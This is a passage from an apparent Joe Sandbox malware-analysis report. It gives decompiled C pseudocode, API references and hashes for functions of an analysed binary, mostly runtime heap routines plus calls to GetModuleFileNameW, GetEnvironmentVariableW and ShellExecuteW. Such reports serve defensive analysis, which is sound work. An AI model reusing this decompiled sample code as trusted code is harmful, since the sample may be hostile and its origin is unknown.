                          • RtlReAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,01300915,?,?,?,?,00000000,?,00000000,01365EED,000000FF), ref: 01356944
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: AllocateHeap$_free
                          • String ID:
                          • API String ID: 1482568997-0
                          • Opcode ID: 57a2de739c4505a607fc88ccd93fe1569b51b2d382e528cfc86ee9091ee691aa
                          • Instruction ID: 0dfd693181ae9f928064be4a3dc557c0b767570820e9cd56370f8fd93ba8ed37
                          • Opcode Fuzzy Hash: 57a2de739c4505a607fc88ccd93fe1569b51b2d382e528cfc86ee9091ee691aa
                          • Instruction Fuzzy Hash: 4BF02DB220015966D7F1296E9C05FBB7F6C8FC2E7CF950125ED1556651DF31D40081A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 701 1349827-134984a call 1355c32 call 1355c8f 706 134984c-1349867 GetModuleHandleExW 701->706 707 1349869-1349876 call 1349799 701->707 706->707
                          C-Code - Quality: 68%
                          			E01349827(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                          				char _v8;
                          				intOrPtr* _t8;
                          				intOrPtr _t16;
                          				intOrPtr* _t18;
                          				intOrPtr* _t21;
                          
                          				_t8 = E01355C32(1, 0x14); // executed
                          				_t21 = _t8;
                          				_t18 = 0;
                          				_v8 = _t21;
                          				E01355C8F(0);
                          				if(_t21 != 0) {
                          					_t16 = _a4;
                          					 *_t21 = _t16;
                          					 *((intOrPtr*)(_t21 + 4)) = _a8;
                          					_t5 = _t21 + 0xc; // 0xc
                          					__imp__GetModuleHandleExW(4, _t16, _t5);
                          					_v8 = 0;
                          					_t18 = _t21;
                          				}
                          				E01349799( &_v8);
                          				return _t18;
                          			}









                          APIs
                            • Part of subcall function 01355C32: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01355B82,00000001,00000364,00000006,000000FF,?,?,0134B464,01355CB5,?,?,013535B4), ref: 01355C73
                          • _free.LIBCMT ref: 01349840
                            • Part of subcall function 01355C8F: HeapFree.KERNEL32(00000000,00000000,?,013535B4), ref: 01355CA5
                            • Part of subcall function 01355C8F: GetLastError.KERNEL32(?,?,013535B4), ref: 01355CB7
                          • GetModuleHandleExW.KERNEL32(00000004,?,0000000C), ref: 0134985E
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Heap$AllocateErrorFreeHandleLastModule_free
                          • String ID:
                          • API String ID: 1586671728-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          [Figure omitted: control-flow graph for the function at 0131C73E; legend: Executed / Not Executed]
                          C-Code - Quality: 75%
                          			E0131C73E(intOrPtr __eax, intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                          				signed int _v0;
                          				signed int _v4;
                          				void* __ebp;
                          				void* _t16;
                          				signed int _t20;
                          				long _t22;
                          				intOrPtr _t25;
                          				signed int _t29;
                          				signed int _t30;
                          				intOrPtr _t34;
                          				intOrPtr _t35;
                          				signed int _t36;
                          				long _t37;
                          				void* _t39;
                          				void* _t41;
                          				void* _t43;
                          
                          				_t35 = __esi;
                          				_t34 = __edi;
                          				_t31 = __edx;
                          				_t25 = __ebx;
                          				if( *0x13a400c == 0) {
                          					__eflags = E01357FAE();
                          					if(__eflags != 0) {
                          						_push(0x16);
                          						E01357FF3(__edx, __eflags);
                          					}
                          					__eflags =  *0x13a40d8 & 0x00000002;
                          					if(( *0x13a40d8 & 0x00000002) != 0) {
                          						_t22 = IsProcessorFeaturePresent(0x17);
                          						__eflags = _t22;
                          						if(_t22 != 0) {
                          							_push(7);
                          							asm("int 0x29");
                          						}
                          						E0134950E(_t25, _t31, _t34, _t35, 3, 0x40000015, 1);
                          						_t43 = _t43 + 0xc;
                          					}
                          					E01352CDB(3);
                          					asm("int3");
                          					_t41 = _t39;
                          					_push(_t41);
                          					_push(_t35);
                          					_t36 = _v4;
                          					__eflags = _t36;
                          					if(_t36 == 0) {
                          						L12:
                          						_t37 = _t36 * _v0;
                          						__eflags = _t37;
                          						if(_t37 == 0) {
                          							_t37 = _t37 + 1;
                          						}
                          						while(1) {
                          							_t16 = RtlAllocateHeap( *0x13ab7d8, 8, _t37); // executed
                          							__eflags = _t16;
                          							if(_t16 != 0) {
                          								break;
                          							}
                          							__eflags = E01355057();
                          							if(__eflags == 0) {
                          								goto L18;
                          							} else {
                          								__eflags = E0135287B(__eflags, _t37);
                          								if(__eflags == 0) {
                          									goto L18;
                          								} else {
                          									continue;
                          								}
                          							}
                          							goto L19;
                          						}
                          					} else {
                          						_t20 = 0xffffffe0;
                          						__eflags = _t20 / _t36 - _v0;
                          						if(__eflags < 0) {
                          							L18:
                          							 *((intOrPtr*)(E0134B45F(__eflags))) = 0xc;
                          							_t16 = 0;
                          							__eflags = 0;
                          						} else {
                          							goto L12;
                          						}
                          					}
                          					L19:
                          					return _t16;
                          				} else {
                          					__imp__EncodePointer(_a4);
                          					_t29 =  *0x13a400c; // 0xa
                          					_t30 = _t29 - 1;
                          					 *0x13a400c = _t30;
                          					 *((intOrPtr*)(0x13aa9a4 + _t30 * 4)) = __eax;
                          					return __eax;
                          				}
                          			}

                          APIs
                          • RtlEncodePointer.NTDLL(012FA63A,?,01317B02,01317B48,?,0131798F,00000000,00000000,00000000,00000004,012FA63A,00000001,(.*),00000004,?), ref: 0131C751
                          • IsProcessorFeaturePresent.KERNEL32(00000017,01355A9C,?,?,01349740,013A18F0,0000000C), ref: 0134B48E
                          Similarity
                          • API ID: EncodeFeaturePointerPresentProcessor
                          • String ID:
                          • API String ID: 4030241255-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 62%
                          			E013124A0(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4) {
                          				void* _v8;
                          				char _v16;
                          				signed int _v20;
                          				intOrPtr _v24;
                          				long _v28;
                          				void _v44;
                          				intOrPtr _v48;
                          				void* _v52;
                          				short _v68;
                          				signed int _v72;
                          				signed int _v76;
                          				char _v96;
                          				intOrPtr _v100;
                          				void* _v104;
                          				char _v120;
                          				short* _v124;
                          				void* __ebp;
                          				signed int _t69;
                          				signed int _t70;
                          				void* _t73;
                          				void* _t75;
                          				signed int _t81;
                          				void* _t88;
                          				short* _t93;
                          				signed int _t105;
                          				signed int _t115;
                          				void* _t122;
                          				void* _t125;
                          				void* _t126;
                          				void* _t130;
                          				void* _t131;
                          				long _t132;
                          				signed int _t135;
                          				void* _t136;
                          				signed int _t137;
                          				void* _t140;
                          				void* _t143;
                          
                          				_t101 = __ebx;
                          				_push(0xffffffff);
                          				_push(0x1367c0d);
                          				_push( *[fs:0x0]);
                          				_t69 =  *0x13a4018; // 0x39cca9f6
                          				_t70 = _t69 ^ _t137;
                          				_v20 = _t70;
                          				_push(__esi);
                          				_push(__edi);
                          				_push(_t70);
                          				 *[fs:0x0] =  &_v16;
                          				_t135 = _a4;
                          				_v72 = _t135;
                          				_v28 = 0;
                          				_v24 = 7;
                          				_v44 = 0;
                          				_t73 = E012F57D0(__ebx, __edx, __edi, 0x210); // executed
                          				_t122 = _t73;
                          				_v28 = 0x104;
                          				_v24 = 0x107;
                          				_t130 = _t122;
                          				_v72 = _t122;
                          				_t75 = memset(_t130, 0, 0x82 << 2);
                          				_t131 = _t130 + 0x82;
                          				 *(_t122 + 0x208) = _t75;
                          				E012F5760( &_v44,  &_v72);
                          				_t143 = _t140 - 0x68 + 0x18;
                          				_v8 = 0;
                          				_t80 =  >=  ? _v44 :  &_v44;
                          				_t81 = GetModuleFileNameW(0,  >=  ? _v44 :  &_v44, _v28);
                          				if(_t81 == 0) {
                          					_v28 = 0;
                          					_t83 =  >=  ? _v44 :  &_v44;
                          					 *( >=  ? _v44 :  &_v44) = 0;
                          				} else {
                          					_t117 = _v28;
                          					if(_t81 > _v28) {
                          						E012F6190(__ebx,  &_v44, _t131, _t81 - _t117, 0);
                          					} else {
                          						_v28 = _t81;
                          						_t120 =  >=  ? _v44 :  &_v44;
                          						( >=  ? _v44 :  &_v44)[_t81] = 0;
                          					}
                          				}
                          				asm("movups xmm0, [ebp-0x28]");
                          				asm("movups [ebp-0x5c], xmm0");
                          				asm("movq xmm0, [ebp-0x18]");
                          				asm("movq [ebp-0x4c], xmm0");
                          				_v8 = 1;
                          				_v52 = 0;
                          				_v48 = 7;
                          				_v68 = 0;
                          				_v8 = 2;
                          				_t132 = _v28;
                          				if(_t132 == 0) {
                          					L10:
                          					asm("movq xmm1, [ebp-0x30]");
                          					asm("movups xmm0, [ebp-0x40]");
                          					goto L11;
                          				} else {
                          					_push(_v72);
                          					_t112 =  >=  ? _v44 :  &_v96;
                          					_t88 = E012F86C0(_t101,  >=  ? _v44 :  &_v96, _t132, _t132,  >=  ? _v44 :  &_v96, "\\", 1);
                          					_t143 = _t143 + 0x10;
                          					if(_t88 == 0xffffffff) {
                          						goto L10;
                          					} else {
                          						_v72 = _t88 + 1;
                          						_push(_v72);
                          						_t114 =  >=  ? _v44 :  &_v96;
                          						_t125 = E012F86C0(_t101,  >=  ? _v44 :  &_v96, _t132, _t132,  >=  ? _v44 :  &_v96, ".", 1);
                          						_t143 = _t143 + 0x10;
                          						if(_t125 == 0xffffffff) {
                          							goto L10;
                          						} else {
                          							_t115 = _v72;
                          							_v104 = 0;
                          							_v100 = 7;
                          							_v120 = 0;
                          							if(_t132 < _t115) {
                          								E012F8000(_t101, _t115, _t125, _t132);
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								_push(_t137);
                          								_t93 = _v124;
                          								if(_t93[8] != 0) {
                          									if(_t93[0xa] >= 8) {
                          										_t93 =  *_t93;
                          									}
                          									return ShellExecuteW(0, 0, _t93, 0, 0, 5);
                          								}
                          								return _t93;
                          							} else {
                          								_t126 = _t125 - _t115;
                          								_t132 = _t132 - _t115;
                          								_t127 =  <  ? _t132 : _t126;
                          								_push( <  ? _t132 : _t126);
                          								_t96 =  >=  ? _v44 :  &_v96;
                          								E012F51B0(_t101,  &_v120, _t132, _t135, ( >=  ? _v44 :  &_v96) + _t115 * 2);
                          								asm("movups xmm0, [ebp-0x74]");
                          								asm("movq xmm1, [ebp-0x64]");
                          								L11:
                          								_t105 = _v76;
                          								 *(_t135 + 0x10) = 0;
                          								 *(_t135 + 0x14) = 0;
                          								asm("movups [esi], xmm0");
                          								asm("movq [esi+0x10], xmm1");
                          								if(_t105 >= 8) {
                          									_push(2 + _t105 * 2);
                          									E012F56A0(_t101, _t132, _v96);
                          								}
                          								 *[fs:0x0] = _v16;
                          								_pop(_t136);
                          								return E0132EA79(_v20 ^ _t137, _t136);
                          							}
                          						}
                          					}
                          				}
                          			}

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,39CCA9F6,?,?), ref: 0131253B
                          Similarity
                          • API ID: FileModuleName
                          • String ID:
                          • API String ID: 514040917-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 38%
                          			E012F54C0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, short* _a8) {
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				intOrPtr _v20;
                          				void* __ebp;
                          				void* _t69;
                          				intOrPtr _t72;
                          				short* _t75;
                          				intOrPtr _t93;
                          				intOrPtr _t94;
                          				unsigned int _t103;
                          				signed int _t105;
                          				intOrPtr _t108;
                          				intOrPtr* _t130;
                          				void* _t135;
                          				signed int _t136;
                          				void* _t141;
                          				void* _t142;
                          
                          				_push(__ebx);
                          				_push(__edi);
                          				_t130 = __ecx;
                          				_t93 =  *__ecx;
                          				_t98 =  *((intOrPtr*)(__ecx + 4)) - _t93;
                          				_v8 = (0x2aaaaaab * (_a4 - _t93) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_a4 - _t93) >> 0x20 >> 2);
                          				_t120 = 0x2aaaaaab * ( *((intOrPtr*)(__ecx + 4)) - _t93) >> 0x20 >> 2;
                          				_t135 = (0x2aaaaaab * ( *((intOrPtr*)(__ecx + 4)) - _t93) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__ecx + 4)) - _t93) >> 0x20 >> 2);
                          				if(_t135 == 0xaaaaaaa) {
                          					L10:
                          					E012F56E0(_t93, _t98, _t120, _t130, __eflags);
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					asm("int3");
                          					return _v20;
                          				} else {
                          					_t136 = _t135 + 1;
                          					_v12 = _t136;
                          					_t103 = (0x2aaaaaab * ( *((intOrPtr*)(__ecx + 8)) - _t93) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__ecx + 8)) - _t93) >> 0x20 >> 2);
                          					_t120 = _t103 >> 1;
                          					if(_t103 <= 0xaaaaaaa - _t120) {
                          						_t69 = _t120 + _t103;
                          						__eflags = _t69 - _t136;
                          						_t98 =  >=  ? _t69 : _t136;
                          						__eflags = _t98 - 0xaaaaaaa;
                          						if(_t98 <= 0xaaaaaaa) {
                          							goto L3;
                          						} else {
                          							E012F4A60();
                          							goto L10;
                          						}
                          					} else {
                          						_t98 = 0xaaaaaaa;
                          						L3:
                          						_v16 = _t98 + _t98 * 2 << 3;
                          						_t72 = E012F57D0(_t93, _t120, _t130, _t98 + _t98 * 2 << 3); // executed
                          						_t94 = _t72;
                          						_t142 = _t141 + 4;
                          						_t105 = _t94 + (_v8 + _v8 * 2) * 8;
                          						_t75 = _a8;
                          						 *((intOrPtr*)(_t105 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t105 + 0x14)) = 0;
                          						_v8 = _t105;
                          						asm("movups xmm0, [eax]");
                          						asm("movups [ecx], xmm0");
                          						asm("movq xmm0, [eax+0x10]");
                          						asm("movq [ecx+0x10], xmm0");
                          						 *((intOrPtr*)(_t75 + 0x10)) = 0;
                          						 *((intOrPtr*)(_t75 + 0x14)) = 7;
                          						 *_t75 = 0;
                          						_t107 =  *_t130;
                          						_t124 =  *((intOrPtr*)(_t130 + 4));
                          						_t76 = _a4;
                          						_push( *_t130);
                          						_push(_t94);
                          						if(_a4 !=  *((intOrPtr*)(_t130 + 4))) {
                          							E012F5770(_t107, _t76, _t130);
                          							_t142 = _t142 + 4;
                          							_t124 =  *((intOrPtr*)(_t130 + 4));
                          							_t107 = _a4;
                          							_push(_v8 + 0x18);
                          						}
                          						E012F5770(_t107, _t124, _t130);
                          						_t108 =  *_t130;
                          						if(_t108 != 0) {
                          							_push(_t108);
                          							E012F5650(_t108,  *((intOrPtr*)(_t130 + 4)));
                          							_push((0x2aaaaaab * ( *((intOrPtr*)(_t130 + 8)) -  *_t130) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t130 + 8)) -  *_t130) >> 0x20 >> 2) + ((0x2aaaaaab * ( *((intOrPtr*)(_t130 + 8)) -  *_t130) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t130 + 8)) -  *_t130) >> 0x20 >> 2)) * 2 << 3);
                          							E012F56A0(_t94, _t130,  *_t130);
                          							_t136 = _v12;
                          						}
                          						 *_t130 = _t94;
                          						 *((intOrPtr*)(_t130 + 4)) = _t94 + (_t136 + _t136 * 2) * 8;
                          						 *((intOrPtr*)(_t130 + 8)) = _v16 + _t94;
                          						return _v8;
                          					}
                          				}
                          			}






















                          APIs
                          • Concurrency::cancel_current_task.LIBCPMT ref: 012F562A
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 118556049-0
                          • Opcode ID: 6324b14b590018fe41ef069ea99116c42a73c0045325675c05118ff57e969a58
                          • Instruction ID: 486cbd0afda6fe196270644322d428e10e6fd56947807a31258ac520a432f7a2
                          • Opcode Fuzzy Hash: 6324b14b590018fe41ef069ea99116c42a73c0045325675c05118ff57e969a58
                          • Instruction Fuzzy Hash: 614190B1A005069FCB0CDF6CD9949A9F7E5FF98304B54826CDA1A9B351DB31EA15CBC0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 73%
                          			E0130A920(void* __ebx, void* __ecx, WCHAR* __edx, void* __edi) {
                          				int _v8;
                          				char _v16;
                          				signed int _v20;
                          				intOrPtr _v24;
                          				int _v28;
                          				char _v44;
                          				void* _v48;
                          				WCHAR* _v52;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t43;
                          				signed int _t44;
                          				void* _t50;
                          				void* _t52;
                          				WCHAR* _t56;
                          				WCHAR* _t72;
                          				signed int _t73;
                          				void* _t79;
                          				void* _t83;
                          				void* _t84;
                          				void* _t86;
                          				void* _t87;
                          				signed int _t88;
                          
                          				_t63 = __ebx;
                          				_push(0xffffffff);
                          				_push(0x1366f2d);
                          				_push( *[fs:0x0]);
                          				_t43 =  *0x13a4018; // 0x39cca9f6
                          				_t44 = _t43 ^ _t88;
                          				_v20 = _t44;
                          				_push(__edi);
                          				_push(_t44);
                          				 *[fs:0x0] =  &_v16;
                          				_v52 = __edx;
                          				_t86 = __ecx;
                          				_v48 = __ecx;
                          				_v48 = __ecx;
                          				if(__edx[8] == 0) {
                          					 *((intOrPtr*)(__ecx + 0x10)) = 0;
                          					 *((intOrPtr*)(__ecx + 0x14)) = 7;
                          					 *__ecx = 0;
                          					E012F51B0(__ebx, __ecx, __edi, __ecx, 0x13836c0, 0);
                          				} else {
                          					_v28 = 0;
                          					_v24 = 7;
                          					_v44 = 0;
                          					_t50 = E012F57D0(__ebx, __edx, __edi, 0x210); // executed
                          					_t79 = _t50;
                          					_v28 = 0x104;
                          					_v24 = 0x107;
                          					_t83 = _t79;
                          					_v48 = _t79;
                          					_t52 = memset(_t83, 0, 0x82 << 2);
                          					_t84 = _t83 + 0x82;
                          					 *(_t79 + 0x208) = _t52;
                          					E012F5760( &_v44,  &_v48);
                          					_t56 = _v52;
                          					_v8 = 0;
                          					_t72 =  >=  ? _v44 :  &_v44;
                          					if(_t56[0xa] >= 8) {
                          						_t56 =  *_t56;
                          					}
                          					_t73 = GetEnvironmentVariableW(_t56, _t72, _v28);
                          					if(_t73 == 0) {
                          						_v28 = 0;
                          						_t75 =  >=  ? _v44 :  &_v44;
                          						 *( >=  ? _v44 :  &_v44) = 0;
                          					} else {
                          						_t59 = _v28;
                          						if(_t73 > _v28) {
                          							E012F6190(_t63,  &_v44, _t84, _t73 - _t59, 0);
                          						} else {
                          							_v28 = _t73;
                          							_t62 =  >=  ? _v44 :  &_v44;
                          							( >=  ? _v44 :  &_v44)[_t73] = 0;
                          						}
                          					}
                          					asm("movups xmm0, [ebp-0x28]");
                          					 *((intOrPtr*)(_t86 + 0x10)) = 0;
                          					 *((intOrPtr*)(_t86 + 0x14)) = 0;
                          					asm("movups [esi], xmm0");
                          					asm("movq xmm0, [ebp-0x18]");
                          					asm("movq [esi+0x10], xmm0");
                          				}
                          				 *[fs:0x0] = _v16;
                          				_pop(_t87);
                          				return E0132EA79(_v20 ^ _t88, _t87);
                          			}



























                          APIs
                          • GetEnvironmentVariableW.KERNEL32(39CCA9F6,?,00000104,39CCA9F6), ref: 0130A9CF
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: EnvironmentVariable
                          • String ID:
                          • API String ID: 1431749950-0
                          • Opcode ID: 0409db1fc36aa02fd365360f95cd9f63303c82c463e0ee6793f5ffbe0de27fe9
                          • Instruction ID: 4c11ef9152af76601200375d93a9a7e520b3f46c4dd260d356d4f3007c60c434
                          • Opcode Fuzzy Hash: 0409db1fc36aa02fd365360f95cd9f63303c82c463e0ee6793f5ffbe0de27fe9
                          • Instruction Fuzzy Hash: 01411470E10709DADB14CFA8D854BAEBBF4FF08318F10462ED506A7690E770A684CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: 1904fd9e74227cd33d41ca40ebd575f19b8f46745a4cfa9f5ea156ea85b3f4f1
                          • Instruction ID: e469afce68a5dcc6e122c40abed9562e51523c31e55d13a7abf04e546019ce68
                          • Opcode Fuzzy Hash: 1904fd9e74227cd33d41ca40ebd575f19b8f46745a4cfa9f5ea156ea85b3f4f1
                          • Instruction Fuzzy Hash: F9318D72A00614DFCB14CF5DC48085EF7F2BF897287168565E915EB360C330A905DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 81%
                          			E01353AA9(void* __ebx, intOrPtr* __ecx, void* __eflags) {
                          				void* _v5;
                          				char _v12;
                          				char _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				char _v36;
                          				void* __edi;
                          				void* __ebp;
                          				void* _t17;
                          				char _t23;
                          				void* _t27;
                          				intOrPtr* _t32;
                          				intOrPtr _t33;
                          
                          				_t32 = __ecx;
                          				_t33 = E01355C32(1, 0xb8);
                          				 *((intOrPtr*)( *_t32)) = _t33;
                          				_t17 = E01355C8F(0);
                          				_t37 = _t33;
                          				if(_t33 != 0) {
                          					_v36 =  *_t32;
                          					_v32 =  *((intOrPtr*)(_t32 + 4));
                          					_v28 =  *((intOrPtr*)(_t32 + 8));
                          					_v24 =  *((intOrPtr*)(_t32 + 0xc));
                          					_v20 =  *((intOrPtr*)(_t32 + 0x10));
                          					_t23 = 4;
                          					_v12 = _t23;
                          					_v16 = _t23;
                          					_push( &_v12);
                          					_push( &_v36);
                          					_push( &_v16); // executed
                          					_t27 = E0135392F(__ebx, _t32, _t37); // executed
                          					return _t27;
                          				}
                          				return _t17;
                          			}



















                          APIs
                            • Part of subcall function 01355C32: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01355B82,00000001,00000364,00000006,000000FF,?,?,0134B464,01355CB5,?,?,013535B4), ref: 01355C73
                          • _free.LIBCMT ref: 01353AC9
                            • Part of subcall function 01355C8F: HeapFree.KERNEL32(00000000,00000000,?,013535B4), ref: 01355CA5
                            • Part of subcall function 01355C8F: GetLastError.KERNEL32(?,?,013535B4), ref: 01355CB7
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Heap$AllocateErrorFreeLast_free
                          • String ID:
                          • API String ID: 314386986-0
                          • Opcode ID: 83ff8b924d40bbcf9b32d81ae61965243c9c99acfa405dd0ceb8c5333ae7d4a1
                          • Instruction ID: 5125abbf04405c732c71c65e168bf5d711b4d691102aad272ae1fb7b076d1faa
                          • Opcode Fuzzy Hash: 83ff8b924d40bbcf9b32d81ae61965243c9c99acfa405dd0ceb8c5333ae7d4a1
                          • Instruction Fuzzy Hash: 51010CB6D00219AFCB50DFA9C441EDEBBB8FB48714F104226E915E7240E770AA45CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01355C32(signed int _a4, signed int _a8) {
                          				void* _t8;
                          				signed int _t13;
                          				signed int _t18;
                          				long _t19;
                          
                          				_t18 = _a4;
                          				if(_t18 == 0) {
                          					L2:
                          					_t19 = _t18 * _a8;
                          					if(_t19 == 0) {
                          						_t19 = _t19 + 1;
                          					}
                          					while(1) {
                          						_t8 = RtlAllocateHeap( *0x13ab7d8, 8, _t19); // executed
                          						if(_t8 != 0) {
                          							break;
                          						}
                          						__eflags = E01355057();
                          						if(__eflags == 0) {
                          							L8:
                          							 *((intOrPtr*)(E0134B45F(__eflags))) = 0xc;
                          							__eflags = 0;
                          							return 0;
                          						}
                          						__eflags = E0135287B(__eflags, _t19);
                          						if(__eflags == 0) {
                          							goto L8;
                          						}
                          					}
                          					return _t8;
                          				}
                          				_t13 = 0xffffffe0;
                          				if(_t13 / _t18 < _a8) {
                          					goto L8;
                          				}
                          				goto L2;
                          			}








                          APIs
                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01355B82,00000001,00000364,00000006,000000FF,?,?,0134B464,01355CB5,?,?,013535B4), ref: 01355C73
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 08bd102952be645310d04b96923c6d642d2b44c29788daa466ea4921b5049d0d
                          • Instruction ID: 54b2c7928288109a98ad6e17a2889f74d922fac2e54f0e452086d7daf2aff0c4
                          • Opcode Fuzzy Hash: 08bd102952be645310d04b96923c6d642d2b44c29788daa466ea4921b5049d0d
                          • Instruction Fuzzy Hash: 92F0E931611535A7EFB16E6D8C44F5B7F4D9F50FB8F188311ED09AB584CA60F40146E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E013576ED(long _a4) {
                          				void* _t4;
                          				long _t8;
                          
                          				_t8 = _a4;
